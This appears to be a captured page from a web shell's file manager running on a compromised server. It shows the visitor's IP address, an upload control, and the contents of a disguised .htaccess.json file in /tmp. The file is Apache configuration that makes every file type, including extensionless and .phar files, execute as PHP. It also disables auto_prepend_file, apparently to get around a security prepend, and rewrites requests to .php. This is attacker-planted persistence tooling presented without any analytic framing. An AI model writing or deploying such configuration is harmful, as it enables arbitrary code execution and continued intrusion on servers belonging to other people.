Your IP : 216.73.216.218


Current Path : /proc/thread-self/root/tmp/
Upload File :
Current File : //proc/thread-self/root/tmp/.htaccess.json

<IfModule mod_php.c>
php_flag engine on
php_value auto_prepend_file none
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php8.c>
php_flag engine on
</IfModule>
AddHandler application/x-httpd-php .php .phtml .php3 .php4 .php5 .phar
AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .phar
SetHandler application/x-httpd-php
<FilesMatch "\.(php|phtml|php3|php4|php5|phar)$">
SetHandler application/x-httpd-php
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ $1.php [L]
</IfModule>
ForceType application/x-httpd-php
php_value engine on
php_flag short_open_tag on